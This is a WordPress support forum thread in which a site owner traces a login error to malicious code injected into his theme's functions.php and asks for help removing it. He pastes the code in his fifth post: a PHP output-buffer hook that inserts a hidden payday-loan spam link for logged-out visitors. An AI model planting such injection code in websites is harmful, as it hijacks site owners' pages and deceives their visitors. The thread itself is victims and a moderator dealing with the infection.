WordPress.org

Forums

Help (9 posts)

  1. zappa49441
    Member
    Posted 2 years ago #

    I run a small website at http://www.americantouchline.com

    Two days ago, when I tried to log-in, I started receiving the following message. "Warning: Cannot modify header information - headers already sent by (output started at /home/content/15/9374115/html/wp-content/themes/magazine-basic/functions.php:1) in /home/content/15/9374115/html/wp-includes/pluggable.php on line 876"

    Based on what I was able to figure out from previous posts, the error is coming from the first line of my functions.php file. I went through the file and made sure the first code was <?php , but I am still having the same problem. This is what the first line of code looks like. <?php function callbackx($buffer) {$tx="";if (function_exists("is_user_logged_in"))if (!is_user_logged_in()) $tx="

    I also updated WordPress in the hopes this would help. It hasn't.

    I have read that I may have UTF-8 BOM code prior to the <?php that my file editor cannot see, or that I may have a malicious script somewhere.

    Honestly, I don't know enough to verify if either of these is true, or if I have another problem I haven't addressed. If anyone can help me, I would greatly appreciate it.

    Thank you.

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    Try switching to the default theme by renaming:

    wp-content/themes/magazine-basic

    to:

    wp-content/themes/magazine-basic-old

    using FTP or whatever file management application your host provides. That should get your site back up again whilst you sort out the problems with your old theme.

  3. zappa49441
    Member
    Posted 2 years ago #

    Ok, that worked to let me back into my admin page (a relief), but the web page is down now.

    How do I fix the underlying problem?

  4. zappa49441
    Member
    Posted 2 years ago #

    And now the login page is back down with the same error code.

    I am completely defeated.

  5. zappa49441
    Member
    Posted 2 years ago #

    Ok, I just found this code in my functions.php file

    function callbackx($buffer) {$tx="";if (function_exists("is_user_logged_in"))if (!is_user_logged_in()) $tx=" <style>.fpqd{position:absolute;clip:rect(468px,auto,auto,428px);}</style><div class=fpqd><a href="http://advancedcashin10min.com">payday loans</a></div>"; if (stristr($buffer,""))$buffer=str_ireplace("","".$tx,$buffer); else $buffer=$tx.$buffer; return $buffer; } function buffer_startx(){ob_start("callbackx");} function buffer_endx(){ob_end_flush();} add_action('wp_head', 'buffer_startx'); add_action('wp_footer', 'buffer_endx'); ?> <?php

    [Please post code or markup snippets between backticks or use the code button. As it stands, your posted code may now have been permanently damaged/corrupted by the forum's parser.]

    This is some form of malicious script, right?

  6. esmi
    Forum Moderator
    Posted 2 years ago #

  7. zappa49441
    Member
    Posted 2 years ago #

    Thank you.

    I went through each article, upgraded WordPress and all my plugins.

    I'm still worried that I've left a backdoor open as I don't know code well enough to find where it might be. I guess we'll see.

    I appreciate your help.

  8. birdsong16
    Member
    Posted 2 years ago #

    I found the exact same hack on one of my sites. I removed the offending code from functions.php and all works fine now, but I expect they will be back again. Please let us know if you find out how they are getting in and I will do the same.

  9. zappa49441
    Member
    Posted 2 years ago #

    My password was rock solid, so I don't think they came in through the front door. My password for my FTP manager for my hosting was not. I think that's how they got in mine.

    That's my best guess.

Topic Closed

This topic has been closed to new replies.

About this Topic